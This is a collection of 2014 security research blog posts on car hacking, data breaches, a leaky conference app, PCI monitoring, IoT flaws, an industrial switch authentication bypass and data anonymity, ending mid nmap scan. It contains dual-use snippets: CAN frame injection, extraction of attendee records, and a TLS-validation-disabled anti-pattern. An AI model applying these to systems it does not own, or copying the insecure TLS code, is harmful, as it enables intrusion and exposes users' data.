INSIGHTS | April 8, 2014

Car Hacking 2: The Content

Does everyone remember when those two handsome young gentlemen controlled automobiles with CAN message injection (https://www.youtube.com/watch?v=oqe6S6m73Zw)? I sure do. However, what if you don't have the resources to purchase a car, pay for insurance, cover repairs, and so on?
 
Fear not, Internet!
 
Chris and Charlie to the rescue. Last week we presented our new automotive research at SyScan 2014. To make a long story short, we provided the blueprints to set up a small automotive network outside the vehicle so security researchers could start investigating Autosec (TM pending) without requiring the large budget needed to procure a real automobile. (Update: Andy Greenberg just released an article explaining our work, http://www.forbes.com/sites/andygreenberg/2014/04/08/darpa-funded-researchers-help-you-learn-to-hack-a-car-for-a-tenth-the-price/)
 
 
Additionally, we provided a solution for a mobile testing platform (a go-kart) that can be fitted with ECUs from a vehicle (or purchased on eBay) for testing that requires locomotion, such as assisted braking and lane departure systems.
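For readers who want a feel for what bench-level CAN experimentation looks like, here is a minimal sketch using the python-can library on a Linux SocketCAN interface. The channel name, arbitration ID, and payload below are placeholders for illustration, not values from the paper; consult the paper itself for the actual bench wiring and message formats.

import can  # pip install python-can; assumes a Linux SocketCAN interface

# Bring the interface up first, e.g.:
#   sudo ip link set can0 up type can bitrate 500000
bus = can.interface.Bus(channel="can0", bustype="socketcan")

# Craft and send a single CAN frame; the ID and data are placeholders,
# not real ECU messages.
msg = can.Message(arbitration_id=0x123,
                  data=[0x01, 0x02, 0x03, 0x04],
                  is_extended_id=False)
bus.send(msg)

# Dump whatever traffic the bench network produces.
for frame in bus:
    print(frame)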
 
 
For those of you who want the gritty technical details, download this paper. As always, we'd love feedback and welcome any questions.
 

 

INSIGHTS | March 26, 2014

A Bigger Stick To Reduce Data Breaches

On average I receive a postal letter from a bank or retailer every two months telling me that I've become the unfortunate victim of a data theft or that my credit card is being re-issued to prevent future fraud. When I quiz my friends and colleagues on the topic, it seems that they suffer the same fate on a recurring schedule. It may not be that surprising to some folks: 2013 saw over 822 million private records exposed, according to the folks over at DataLossDB – and that's just the breaches that were disclosed publicly.

It's clear to me that something is broken, and it's only getting worse. When it comes to the collection of personal data, too many organizations have a finger in the pie and are ill-equipped (or unprepared) to protect it. In fact, I'd question why they're collecting it in the first place. All too often these organizations – of which I'm supposedly a customer – are collecting personal data about "my experience" doing business with them and hoping to figure out how to use it for profit (effectively turning me into a product). If these corporations were some bloke visiting a psychologist, they'd be diagnosed with a hoarding disorder. For example, consider the criteria the DSM-5 diagnostic manual uses to identify the disorder:

  • Persistent difficulty discarding or parting with possessions, regardless of the value others may attribute to these possessions.
  • This difficulty is due to strong urges to save items and/or distress associated with discarding.
  • The symptoms result in the accumulation of a large number of possessions that fill up and clutter active living areas of the home or workplace to the extent that their intended use is no longer possible.
  • The symptoms cause clinically significant distress or impairment in social, occupational, or other important areas of functioning.
  • The hoarding symptoms are not due to a general medical condition.
  • The hoarding symptoms are not restricted to the symptoms of another mental disorder.

Whether or not the organizations hoarding personal data know how to profit from it, it's clear that even the biggest of them are increasingly inept at protecting it. The criminals pilfering the data certainly know what they're doing. The gray market for identity laundering has expanded phenomenally since I talked about it at Black Hat in 2010.

We can moan all we like about the state of the situation now, but we'll be crying in the not-too-distant future when, statistically, we progress from being victims of data loss to being victims of (unrecoverable) fraud.

The way I see it, there are two core components to dealing with the spiraling problem of data breaches and the disclosure of personal information. We must deal with the “what data are you collecting and why?” questions, and incentivize corporations to take much more care protecting the personal data they’ve been entrusted with.

I feel that the data-hoarding problem can be dealt with fairly easily. At the end of the day, it's about transparency and the ability to "opt out". If I were to choose a role model for making a sizable fraction of this threat go away, I'd look to the basic components of the UK's Data Protection Act as the cornerstone of a solution – especially here in the US. I believe the key components of personal data collection should encompass the following:

  • Any organization that wants to collect personal data must have a clearly identified “Data Protection Officer” who not only is a member of the executive board, but is personally responsible for any legal consequences of personal data abuse or data breaches.
  • Before data can be collected, the details of the data sought, how that data is to be used, how long it will be retained, and who will use it must be submitted for review to a government or legal authority – i.e., some third-party entity capable of deciding what constitutes acceptable use, a bit like the ethics boards used for medical research.
  • The specifics of what data a corporation collects and what they use that data for must be publicly visible. Something similar to the nutrition labels found on packaged foods would likely be appropriate – so the end consumer can rapidly discern how their private data is being used.
  • Any data being acquired must include a date of when it will be automatically deleted and removed.
  • At any time any person can request a copy of any and all personal data held by a company about themselves.
  • At any time any person can request the immediate deletion and removal of all data held by a company about themselves.

If such governance existed for the collection and use of personal data, then the remaining big item is enforcement. You’d hope that the morality and ethics of corporations would be enough to ensure they protected the data entrusted to them with the vigor necessary to fight off the vast majority of hackers and organized crime, but this is the real world. Apparently the “big stick” approach needs to be reinforced.

A few months ago I delved into how the fines levied against organizations that had been remiss in doing all they could to protect their customers' personal data should be bigger and divvied up differently. Essentially, I'd argue that half of the fine should be pumped back into the breached organization and used to increase its security posture.

Looking at the fines imposed upon the larger organizations (which could easily have invested more in protecting their customers' data prior to their breaches), the amounts are laughable. No noticeable financial pain occurs, so why should we be surprised when it happens again? I've become a firm believer that the fines businesses incur should be based upon a percentage of valuation. Why should a twenty-billion-dollar business face the same fine for losing 200,000,000 personal records as a ten-million-dollar business does for losing 50,000? If the fine were something like two percent of valuation – $400 million for the former, $200,000 for the latter – I can tell you that the leadership of both companies would focus far more firmly on keeping your data and mine much safer than they do today.

INSIGHTS | February 27, 2014

Beware Your RSA Mobile App Download

It's been half a decade since Apple launched their iPhone campaign titled "There's an app for that". In the years since, the mobile app stores (from all the major players) have continued to blossom, to the point that not only are there several thousand apps that help light your way (i.e., by keeping the flash running bright), but every company, cause, group, or notable event is expected to publish its own mobile application.
 
Today there are several hundred good "rapid development" kits that allow any newbie to craft and release their own mobile application, and several thousand small professional software development teams that will create one on your behalf. These bespoke mobile applications aren't the types of products that their owners expect to make much (if any) money from. Instead, these apps are generally helpful tools that appeal to a particular target audience.
 
Now, while the cynical side of me would like to point out that some people should never be trusted with tools as lofty as HTML and setting up WordPress sites – let alone building a mobile app – many corporate marketing teams I've dealt with have not only drunk the "There's an app for that" Kool-Aid, they appear to bathe in the stuff each night. As such, a turnkey approach to app production is destined to involve many sacrifices, and at the top of the sacrificial pillar sit data security and integrity.
 
A few weeks ago I noticed that, in the run-up to the RSA USA 2014 conference, a new mobile application had been conceived, thrust upon the Apple and Google app stores, and electronically marketed to the world at large. Maybe it was a reaction to being spammed with a never-ending tirade of "come see us at RSA" emails, maybe it was topical off the back of a recent blog post on the state of mobile banking application security, or maybe both – but I asked some of the IOActive consulting team who had a little bench time between jobs to have a poke at the freshly minted "RSA Conference 2014" mobile application.
 
 
 
The Google Play app store describes the RSA Conference 2014 application like this:
With the RSA Conference Mobile App, you can stay connected with all Conference activities, view the event catalog, manage session schedules and engage with colleagues and peers while onsite using our social and professional networking tools. You’ll have access to dynamic agenda updates, venue maps, exhibitor listing and more!
Now, I wasn't expecting the application to be particularly interesting – it's not as if it were a transactional banking application – but I would have thought that RSA (or whoever they tasked with commissioning the application) would have at least applied some basic elbow grease so as not to embarrass themselves. Alas, that was not to be the case.
 
The team came back rather quickly with a half-dozen security issues. Technically, the highest-impact vulnerability was the app's susceptibility to man-in-the-middle attacks, in which an attacker could inject additional code into the login sequence and phish credentials. If we were dealing with a banking application, heads would have been rolling in an engineering department, but this particular app has only been downloaded a few thousand times, and I seriously doubt that some evil hacker is going to take the time out of their day to target this one application (out of tens of millions) to try to phish credentials to a conference.
 
It was the second most severe vulnerability that caught my eye, though. The RSA Conference 2014 application downloads a SQLite DB file that is used to populate the visual portions of the app (such as schedules and speaker information) but, for some bizarre reason, it also contains information about every registered user of the application – including their name, surname, title, employer, and nationality.
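For anyone curious just how little effort inspecting such a file takes, Python's stock sqlite3 module is enough. Here is a minimal sketch, assuming the DB has already been pulled from the device or app bundle; the file name and the "attendees" table are hypothetical stand-ins, not the app's real schema.

import sqlite3

conn = sqlite3.connect("conference.db")  # hypothetical path to the pulled DB
cur = conn.cursor()

# Enumerate the tables the app shipped with.
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
print([row[0] for row in cur.fetchall()])

# 'attendees' is a placeholder for whatever table holds registered users.
for name, surname, title, employer in cur.execute(
        "SELECT name, surname, title, employer FROM attendees"):
    print(name, surname, title, employer)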
 
 
 
I have no idea why the app developers chose to do that, but I'm pretty sure the folks who downloaded and installed the application are unlikely to have thought that their details were being published in this way. Marketers love this kind of information, though!
 
Some readers may think I’m targeting RSA, and in a small way I guess I am. Security flaws in mobile applications (particularly these rapidly developed and targeted apps) are endemic, and I think the RSA example helps prove the point that there are often inherent risks in even the most benign applications.
 
I'm betting that RSA didn't even create the application themselves. The Google Play store indicates that a company called QuickMobile was the developer. With one small click it's possible to get a list of all the other applications QuickMobile has created, presumably on their clients' behalf.
 
 
 
As you can see from the above, there are lots of popular brands and industry conferences employing their app-creation services. I wonder how many of them share the same vulnerabilities as the RSA Conference 2014 application?
 
Here's a little bit of advice for any corporate marketing team. If you're going to release your own mobile application, the security and integrity of that application are your responsibility. While you can't outsource that responsibility, you can get another organization to assess the application on your behalf.
 
In the meantime, readers of this blog may want to refrain from downloading the RSA Conference 2014 (and related) mobile applications – unless you're a hacker or a marketing team that wants to acquire a free list of conference attendees' names, positions, and employers.
INSIGHTS | February 19, 2014

PCI DSS and Security Breaches

Every time an organization suffers a security breach and cardholder data is compromised, people question the effectiveness of the Payment Card Industry Data Security Standard (PCI DSS). Blaming PCI DSS for the handful of companies that are breached every year shows a lack of understanding of the standard’s role. 
Two major misconceptions are responsible for this.
 
First, PCI DSS is a compliance standard. An organization can be compliant today and not tomorrow. It can be compliant when an assessment is taking place and noncompliant the minute the assessment is completed.
Unfortunately, some organizations don’t see PCI DSS as a standard that applies to their day-to-day operations; they think of it as a single event that they must pass at all costs. Each year, they desperately prepare for their assessment and struggle to remediate the assessor’s findings before their annual deadline. When they finally receive their attestation, they check out and don’t think about PCI DSS compliance until next year, when the whole process starts again. 
 
Their information security management system is immature, ad-hoc, perhaps even chaotic, and driven by the threat of losing a certificate or being fined by their processor.
 
To use an analogy, PCI DSS compliance is not a race to a destination; it's about how consistently well you drive toward it. Many organizations accelerate from zero to sixty in seconds, brake abruptly, and start all over again a month later. The number of security breaches will be reduced as soon as organizations and assessors both understand that a successful compliance program is not a single state but an ongoing process. An organization with a mature and repeatable process will be compliant continuously, with rare exceptions, and not only during the assessment.
 
Second, in the age of Advanced Persistent Threats (APTs), the challenge for most organizations is not whether they can prevent an attack from ever occurring, but how quickly they can become aware that a breach has actually occurred.
 
PCI DSS requirements can be classified into three categories:  
 
1. Requirements intended to prevent an incident from happening in the first place. 
These requirements include implementing network access controls, configuring systems securely, applying periodic security updates, performing periodic security reviews, developing secure applications, providing security awareness to the staff, and so on. 
 

2. Requirements designed to detect malicious activities.
These requirements involve implementing solutions such as antivirus software, intrusion detection systems, and file integrity monitoring.


3. Requirements designed to ensure that if a security breach occurs, actions are taken to respond to and contain the security breach, and ensure evidence will exist to identify and prosecute the attackers.

 
Too many organizations focus their compliance resources on the first group of requirements. They give the second and third groups as little attention as possible. 
 
This is painfully obvious. According to the Verizon Data Breach Investigations Report (DBIR) and the public information available about the most recent company breaches, most organizations become aware of a security breach weeks or even months after the initial compromise, and only when notified by the payment card brands or law enforcement. This confirms a clear reality: breached organizations do not have the proper tools and/or qualified staff to monitor their security events and logs.
 
Once all the preventive and detective security controls required by PCI DSS have been properly implemented, the only thing left for an organization is to thoroughly monitor logs and events. The goal is to detect anomalies and take any necessary actions as soon as possible.
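As a toy illustration of what monitoring for anomalies can mean in practice, the sketch below counts failed SSH logins per source address in a syslog-style auth log and flags noisy sources. The log path, line format, and threshold are assumptions for the example; a real PCI environment would feed events to a SIEM rather than run a one-off script.

import re
from collections import Counter

FAILED = re.compile(r"Failed password .* from (\d+\.\d+\.\d+\.\d+)")
THRESHOLD = 10  # alert once a single source passes this many failures

counts = Counter()
with open("/var/log/auth.log") as log:  # assumed log location
    for line in log:
        match = FAILED.search(line)
        if match:
            counts[match.group(1)] += 1

for source, failures in counts.most_common():
    if failures >= THRESHOLD:
        print(f"ALERT: {failures} failed logins from {source}")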
 
Having sharp individuals in this role is critical for any organization. The smarter the individuals doing the monitoring are, the less opportunity attackers have to get to your data before they are discovered. 
 
You cannot avoid getting hacked. Sooner or later, to a greater or lesser degree, it will happen. What you can really do is monitor and investigate continuously.
 

 

In PCI DSS compliance, monitoring is where companies are really failing.
INSIGHTS | February 17, 2014

INTERNET-of-THREATS

At IOActive Labs, I have the privilege of being part of a great team with some of the world's best hackers. I also have access to really cool research on different technologies that uncovers security problems affecting widely used hardware and software. This gives me a solid understanding of the state of security for many different software and hardware devices – an understanding grounded in real-life research rather than opinions and theories.
 
Currently, the term Internet-of-Things (IoT) is becoming a buzzword used in the media, announcements from hardware device manufacturers, etc. Basically, it’s used to describe an Internet with everything connected to it. It describes what we are seeing nowadays, including:
  • Laptops, tablets, smartphones, set-top boxes, media-streaming devices, and data-storage devices
  • Watches, glasses, and clothes
  • Home appliances, home switches, home alarm systems, home cameras, and light bulbs
  • Industrial devices and industrial control systems
  • Cars, buses, trains, planes, and ships
  • Medical devices and health systems
  • Traffic sensors, seismic sensors, pollution sensors, and weather sensors
     …and more; you name it, and it is or soon will be connected to the Internet.
 
While the devices and systems connected to the Internet are different, they have something in common: most of them suffer from serious security vulnerabilities. This is not a guess. It is based on IOActive Labs' security research into many of these types of devices currently being used worldwide. Sadly, we are seeing almost exactly the same vulnerabilities in these devices that have plagued software vendors over the last decade – vulnerabilities that the most important software vendors are trying hard to eradicate. It seems that many hardware companies are following really poor security practices when adding software to their products and connecting them to the Internet. What is worse, vendors sometimes don't even respond to security vulnerability reports, or they downplay the threat and don't fix the vulnerabilities. Many vendors don't even know how to properly deal with the security vulnerabilities being reported.
 
Some of the common vulnerabilities IOActive Labs finds include:
  • Sensitive data sent over insecure channels
  • Improper use of encryption
    • No SSL certificate validation (see the sketch after this list)
    • Things like encryption keys and signing certificates easily available to anyone
  • Hardcoded credentials/backdoor accounts
  • Lack of authentication and/or authorization
  • Storage of sensitive data in clear text
  • Unauthenticated and/or unauthorized firmware updates
  • Lack of firmware integrity check during updates
  • Use of insecure custom-made protocols
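To pick just one item from that list, the sketch below shows what doing SSL certificate validation right looks like in Python, next to the validation-disabled pattern we keep finding in device companion software. The host name is a placeholder.

import socket
import ssl

HOST = "device.vendor-cloud.example"  # placeholder host name

# The right way: a default context verifies the certificate chain
# and checks that the certificate matches the host name.
context = ssl.create_default_context()
with socket.create_connection((HOST, 443)) as sock:
    with context.wrap_socket(sock, server_hostname=HOST) as tls:
        print(tls.version(), tls.getpeercert()["subject"])

# The anti-pattern: validation turned off, which hands any
# man-in-the-middle attacker a free pass.
bad_context = ssl._create_unverified_context()  # don't do this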
Also, data ambition is working against vendors and is increasing attack surfaces considerably. For example, all collected data is sent to the "vendor cloud" and device commands are sent from the "vendor cloud", instead of users simply being allowed to connect directly to and command their devices. Hacking into the "vendor cloud" = thousands of devices compromised = lots of lost money.
 
Why should we worry about all of this? Well, these devices affect our everyday life and will continue to do so more and more. We've only seen the tip of the iceberg when it comes to the attacks that people, companies, and governments face and how easily they can be performed. If the situation doesn't change soon, it is just a matter of time before we witness attacks with tragic consequences.
 
If a headline like “+100K Digital Toilets from XYZ1.3 Inc. Found Sending Spam and Distributing Malware” doesn’t scare you because you think it’s funny and improbable, you could be wrong. We shouldn’t wait for headlines such as “Dozens of People Injured When Home Automation Devices Hacked” before we react.
 
Something must be done! From enforcing secure practices during product development to imposing high fines when products are hacked, action must be taken to prevent the loss of money and possibly even lives.
 
Companies should strongly consider:
    • Training developers on secure development
    • Implementing security development practices to improve software security
    • Training company staff on security best practices
    • Implementing a security patch development and distribution process
    • Performing product design/architecture security reviews
    • Performing source code security audits
    • Performing product penetration tests
    • Performing company network penetration tests
    • Staying up-to-date with new security threats
    • Creating a bug bounty program to reward reported vulnerabilities and clearly defining how vulnerabilities should be reported
    • Implementing a security incident/emergency response team
It is difficult to give advice to end users, given that the best solution is often simply not to buy or use many products, because they are insecure by design. At this stage, it's just a matter of being lucky and hoping that you won't be hacked. Maybe opportunistic vendors will come up with some novel solution, such as an IPS/anti* device that will protect all of your devices from attacks. Just pray that the protection device itself is not vulnerable.
 
Sometimes end users are forced to live with insecure devices since there isn’t any way to turn them off or not to use them. These include devices provided by TV cable companies, electricity and gas companies, public services companies, governments, etc. These companies and the government should take responsibility for deploying secure products.
 
This is not BS – in a couple of days we will be releasing some of the extensive research I mentioned, on which this blog post is based.
 
I intend this post to be a wake-up call for everyone! I'm really concerned about the current situation. In the meantime, I will use the term INTERNET-of-THREATS (not Internet-of-Things). Maybe this new buzzword will make us more conscious of the situation. If it doesn't, then at least I have tried.
INSIGHTS | February 14, 2014

The password is irrelevant too

In this follow-up to a blog post on the Scalance X200 series switches, we look at an authentication bypass vulnerability. It isn't particularly complicated, but it does allow us to download configuration files, log files, and a firmware image. It can also be used to upload configuration files and firmware images, which causes the device to reboot.
 
The code can be found in the IOActive Labs GitHub repository.
 
If an attacker has access to a configuration file with a known password, they can use this code to update the configuration file and take over the switch's management functions. It can also be used to mirror ports and enable or disable other services, such as Telnet, SSH, or SNMP. Lastly, the same script can be used to upload a firmware image to the device sans authentication. In other words, it is *delightfully reprogrammable* until you install the patch.
 
 
This brings us to an interesting point. I asked Siemens if the SSH keys in Firmware V5.X (the fixed version) are unique per device, and I was assured that they are. If this is true, there should be no problem with me publishing a hash of the private key for my device. Don’t worry damsels and chaps, I can always patch my device with a new key later, as a demonstration of my enthusiasm for firmware. 
 
Anyway, here are two fingerprints of the private SSH key: 
 
MD5   6f09a4d77569236fd90483a85920912d
SHA256    505166f90ee05761b11a5feda24d0ccdc53ef902cdd617b330db3634cc2788f7
 
If you have one of these devices and have patched to the version that contains the fixes, you could assist the community greatly by verifying that the key has a different fingerprint. This will independently confirm what those outstanding gentry at Siemens told me and promote confidence in their security solutions.
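If you would like to try, a sketch along these lines will grab a device's public host key and print fingerprints in the same two formats. It assumes ssh-keyscan is installed, and the address is a placeholder for your own switch; since the public key is derived from the private key, two devices sharing a fingerprint would be sharing the private key as well.

import base64
import hashlib
import subprocess

HOST = "192.168.0.5"  # placeholder: your own switch

# Fetch the RSA host key without logging in.
output = subprocess.check_output(["ssh-keyscan", "-t", "rsa", HOST], text=True)

for line in output.splitlines():
    if line.startswith("#"):
        continue
    _, keytype, b64key = line.split()[:3]
    raw = base64.b64decode(b64key)
    print(keytype)
    print("MD5   ", hashlib.md5(raw).hexdigest())
    print("SHA256", hashlib.sha256(raw).hexdigest())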
 
This neatly segues into some changes we’ve seen in the ICS-space over the last few years. 
 
The primary change in behavior I'd like to applaud is how companies are striving to develop better relationships with independent security researchers such as myself. The increase in constructive dialogue is evidenced by Siemens' ability to receive notification and then produce a patch within three months. Years ago we were regularly waiting six months to two years for fixes.
 
In fact, I challenged vendors at S4x14 to commit to an AVERAGE TIME of security patching for externally supplied vulnerabilities. We purposefully chose the average time for this challenge, because we know that providing quality assurance for these systems is difficult and can be time-consuming. After all, some bugs are just thornier than others.
 
Incidentally, this is backed up by empirical research shared with me by the inimitable Sean McBride during our conversations at S4x14. I wouldn’t want you to think I am just some un-gentlemanly shuffler or simkin, challenging hecatonchires for the sport of it (hat-tip @sergeybratus).
 
Follow @digitalbond to see the response I got to committing to an average security patch time when my "Red/Blue Live" talk goes online. You'll also notice that my two attackers (red team) did not manage to use the script to take over the device, despite doing so in practice sessions the night before. The ingenious Rotem Bar (blue team) demonstrated that the secret of ICS security is simply to *patch*. Apparently, it is not only possible, but effective!
…and btw, happy Valentine’s!
INSIGHTS | February 6, 2014

An Equity Investor’s Due Diligence

Information technology companies constitute the core of many investment portfolios nowadays. With so many new startups popping up, and some highly visible IPOs and acquisitions by public companies egging things on, many investors are clamoring for a piece of the action and looking for new ways to rapidly qualify or disqualify an investment; particularly so when it comes to the hottest of hot investment areas – information security companies.

Over the years I've found myself working with a number of private equity investment firms – helping them to review the technical merits and implications of products being brought to market by new security startups. In most cases it's not until the B or C investment rounds that the money being sought by the fledgling company starts to get serious for the investors I know. If you're going to be handing over money in the five- to twenty-million-dollar range, you're going to want to do your homework on both the company and the product opportunity.

Over the last few years I've noted that a sizable number of private equity investment firms have built into their portfolio review the kind of technical due diligence traditionally associated with the formal acquisition processes of Fortune 500 technology companies. It would seem that the $20,000 to $50,000 price tag for a quick-turnaround technical due diligence report is proving to be a valuable investment in a somewhat larger investment strategy.

When it comes to performing technical due diligence on a startup (whether it's a security or a social media company, for example), the process tends to require a mix of technical review and tapping past experience if it's to be useful, let alone actionable, to the potential investor. Here are some of the due diligence phases I recommend, and why:

    1. Vocabulary Distillation – For some peculiar reason, new companies go out of their way to invent their own vocabulary to describe their value proposition, or they go to great lengths to disguise the underlying processes of their technology with what can best be described as word-soup. For example, a "next-generation big-data derived heuristic determination engine" can more than adequately be summed up as "signature-based detection". Apparently using the word "signature" in your technology description is frowned upon, and the product management folks avoid using the word (however applicable it may be). Distilling the word-soup is a key component of being able to compare apples with apples.
    2. Overlapping Technology Review – Everyone wants to portray their technology as unique, ground-breaking, or next generation. Unfortunately, when it comes to the world of security, next year's technology is almost certainly a progression of the last decade's worth of invention. This isn't necessarily bad, but it is important to determine the DNA and hereditary path of the "new" technology (and subcomponents of the product the start-up is bringing to market). Being able to filter through the word-soup of the first phase and determine whether the start-up's approach duplicates functionality from IDS, AV, DLP, NAC, etc. is critical. I've found that many start-ups position their technology (i.e. advancements) against antiquated and idealized versions of these prior technologies. For example, simplifying desktop antivirus products down to signature engines – while neglecting things such as heuristic engines, local-host virtualized sandboxes, and dynamic cloud analysis.
    3. Code Language Review – It's important to look at the languages the company has employed in developing its product. Popular rapid-prototyping technologies like Ruby on Rails or Python are likely acceptable for back-end systems (as employed within a private cloud), but are potential deal killers to future acquirers that will want to integrate the technology with their existing product portfolio (i.e. they're not going to want to rewrite the product). Similarly, a C or C++ implementation may not offer the flexibility needed for rapid evolution or integration into scalable public cloud platforms. Knowing which development technology has been used where, and for what purpose, can rapidly qualify or disqualify the strength of the company's product management and engineering teams – and help orientate an investor on future acquisition or IPO paths.
    4. Security Code Review – Depending upon the size of the application and the due diligence period allowed, a partial code review can yield insight into a number of increasingly critical areas – such as the stability and scalability of the code base (and consequently the maturity of the development processes and engineering team), the number and nature of vulnerabilities (i.e. security flaws that could derail the company publicly), and the effort required to integrate the product or proprietary technology with existing major platforms.
    5. Does it do what it says on the tin? – I hate to say it, but there's a lot of snake oil being peddled nowadays. This is especially so for new enterprise protection technologies. In a nutshell, this phase focuses on the claims made by the marketing literature and product management teams, and tests both the viability and the technical merits of each of them. Test harnesses are usually created to monitor how well the technology performs in the face of real threats – ranging from the samples provided by the company's user acceptance testing (UAT) team (i.e. the stuff they guarantee they can handle), through common hacking tools and tactics, and on to a skilled adversary with key domain knowledge.
    6. Product Penetration Test – Conducting a detailed penetration test against the start-up's technology, product, or service delivery platform is always thoroughly recommended. These tests tend to unveil important information about the lifecycle maturity of the product and the potential exposure to negative media attention due to exploitable flaws. This is particularly important for consumer-focused products and services, because they are the most likely to be uncovered and exposed by external security researchers and hackers, and any public exploitation can easily set the start-up back a year or more in brand equity alone. For enterprise products (e.g. appliances and cloud services) the hacker threat is different; the focus should be more upon what vulnerabilities could be introduced into the customers' environment and how much effort would be required to re-engineer the product to meet security standards.


Obviously there's a lot of variety in the technical capabilities of the various private equity investment firms (and private investors). Some have people capable of sifting through the marketing hype to discern the actual intellectual property powering a start-up's technology – but many do not. Regardless, in working with these investment firms and performing technical due diligence on their potential investments, I've yet to encounter a situation where they didn't "win" in some way or other. A particular favorite of mine is when, following a code review and penetration test that unveiled numerous serious vulnerabilities, the private equity firm was still intent on investing in the start-up but was able to use the report to negotiate much better buy-in terms with the existing investors – gaining a larger percentage of the start-up for the same amount.

INSIGHTS | January 21, 2014

Scientifically Protecting Data

This is not “yet another Snapchat Pwnage blog post”, nor do I want to focus on discussions about the advantages and disadvantages of vulnerability disclosure. A vulnerability has been made public, and somebody has abused it by publishing 4.6 million records. Tough luck! Maybe the most interesting article in the whole Snapchat debacle was the one published at www.diyevil.com [1], which explains how data correlation can yield interesting results in targeted attacks. The question then becomes, “How can I protect against this?”

Stored personal data is always vulnerable to attackers who can track it back to its original owner. Because skilled attackers can sometimes gain access to metadata, there is very little you can do to protect your data aside from not storing it at all. Anonymity and privacy are not new concepts. Industries such as healthcare have used them for decades, if not centuries. For the healthcare industry, protecting patient data remains one of the most challenging problems. Where does the balance tip between protecting privacy by not disclosing that person X is a diabetic, and protecting health by giving EMTs information about allergies and existing conditions? It's no surprise that those who research data anonymity and privacy often use healthcare information for their test cases. In this blog, I want to focus on two key principles relating to this.

k-Anonymity [2] 
In 2000, Latanya Sweeney used US Census data to prove that 87% of US citizens are uniquely identifiable by their birth date, gender, and ZIP code [3]. That isn't surprising from a mathematical point of view: there are approximately 310 million Americans and roughly 2 billion possible combinations of the {birth date, gender, ZIP code} tuple. You can easily find out how unique you really are through an online application that uses the latest US Census data [4]. Although it would be best not to store "unique identifiers" like names, usernames, or social security numbers at all, that is rarely practical. Assuming that data storage is a requirement, k-Anonymity comes into play. By using data suppression, where data is replaced by an *, and data generalization, where – as an example – a specific age is replaced by an age range, companies can anonymize a data set to a level where each row is identical to at least k-1 other rows in the dataset. Whoever thought an anonymity level could actually be mathematically proven?
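As a toy illustration of those two operations, the sketch below generalizes exact ages into decade ranges, suppresses the tail of each ZIP code, and then computes the effective k of the result: the size of the smallest group of rows sharing a quasi-identifier tuple. The records are invented for the example.

from collections import Counter

records = [  # invented (age, gender, zip) tuples
    (34, "F", "98101"), (36, "F", "98105"),
    (33, "M", "98101"), (38, "M", "98109"),
]

def generalize(age, gender, zipcode):
    # Replace the exact age with a decade range; suppress the ZIP suffix.
    decade = (age // 10) * 10
    return (f"{decade}-{decade + 9}", gender, zipcode[:3] + "**")

anonymized = [generalize(*row) for row in records]

# k is the size of the smallest equivalence class of identical rows.
k = min(Counter(anonymized).values())
print("dataset is k-anonymous with k =", k)  # k = 2 here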

k-Anonymity has known weaknesses. Imagine that you know that the data of your Person of Interest (POI) is among four possible records in an anonymized dataset. If these four records share a common trait like "disease = diabetes", you know that your POI suffers from this disease without knowing which record contains their data. With sufficient metadata about the POI, another concept comes into play. Coincidentally, this is also where we find a possible solution for preventing correlation attacks against breached databases.

l-diversity [5] 
One thing companies cannot control is how much knowledge an adversary has about a POI. This does not, however, release us from our responsibility to protect user data. This is where l-Diversity comes into play. This concept does not focus on the fields that attackers can use to identify a person from available data. Instead, it focuses on the sensitive information in the dataset. By applying the l-Diversity principle to a dataset, companies can make it notably more expensive for attackers to correlate information, by increasing the number of required data points.
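Continuing the toy example, l is the smallest number of distinct sensitive values found in any group of rows sharing a quasi-identifier tuple; a homogeneous group, like the diabetes case above, yields l = 1. A minimal sketch:

from collections import defaultdict

rows = [  # (quasi-identifier tuple, sensitive value), invented data
    (("30-39", "F", "981**"), "diabetes"),
    (("30-39", "F", "981**"), "flu"),
    (("30-39", "M", "981**"), "diabetes"),
    (("30-39", "M", "981**"), "diabetes"),  # homogeneous group: l = 1
]

classes = defaultdict(set)
for quasi_id, sensitive in rows:
    classes[quasi_id].add(sensitive)

l = min(len(values) for values in classes.values())
print("dataset is l-diverse with l =", l)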

Solving Problems 
All of this sounds very academic, and the question remains whether or not we can apply this in real-life scenarios to better protect user data. In my opinion, we definitely can.

Social application developers should become familiar with the principles of k-Anonymity and l-Diversity. It’s also a good idea to build KPIs that can be measured against. If personal data is involved, organizations should agree on minimum values for k and l.

More and more applications allow a user's email address to be the same as the associated username. This directly impacts the database's l-Diversity score. Organizations should let users select their own usernames and also offer auto-generated usernames. Both tactics have drawbacks, but from a security point of view they make sense.

Users should have some control. This becomes clear when analyzing the common data points that every application requires.

  • Email address:
    • Do not use your corporate email address for online services, unless it is absolutely necessary
    • If you have multiple email addresses, randomize the email addresses that you use for registration
    • If your email provider allows you to append random strings to your email address, such as name+random@gmail.com, use this randomization—especially if your email address is also your username for this service
  • Username:
    • If you can select your username, make it unique
    • If your email address is also your username, see my previous comments on this
  • Password:
    • Select a unique password for each service
    • In some cases, select a phone number for 2FA or other purposes

By understanding the concepts of k-Anonymity and l-Diversity, we now know that this statement in the www.diyevil.com article is incorrect:

“While the techniques described above depend on a bit of luck and may be of limited usefulness, they are yet another tool in the pen tester’s toolset for open source intelligence gathering and user attack vectors.”

The success of the techniques discussed in this blog depends on science and math. And where science and math are in play, solutions can be devised. I can only hope that the troves of "data scientists" currently being recruited also understand the principles I have described. I also hope that we will eventually evolve into a world where not only big data matters, but where anonymity and privacy are no longer empty words.

[1] http://www.diyevil.com/using-snapchat-to-compromise-users/
[2] https://ioactive.com/wp-content/uploads/2014/01/K-Anonymity.pdf
[3] https://ioactive.com/wp-content/uploads/2014/01/paper1.pdf
[4] http://aboutmyinfo.org/index.html
[5] https://ioactive.com/wp-content/uploads/2014/01/ldiversityTKDDdraft.pdf

INSIGHTS | January 13, 2014

The password is irrelevant

This story begins with a few merry and good-hearted tweets from S4x13. These tweets, in fact:
 
 
Notice the shared conviviality, and the jolly manner in which this discussion of vulnerabilities occurs.
 
It is with this same lightness in my heart that I thought I would explore the mysterious world of the Scalance X200 series switch.

 
So I waxed my moustache, rolled up my sleeves, and began to use the arcane powers of Quality Assurance. 
 
OK, how would an attacker who doesn't have default credentials or a device to test on go about investigating one of these remotely? Why, find one on Shodan, of course!
 
 
Personally, I buy mine second hand from eBay with the fortune I inherited from my grandfather’s moustache wax empire.
 
The first thing an attacker would normally do is scan the device to get familiar with its ports and services. A quick nmap scan looks like this:
 
Nmap scan report for Unknown (192.168.0.5)
Host is up (0.0043s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE  VERSION
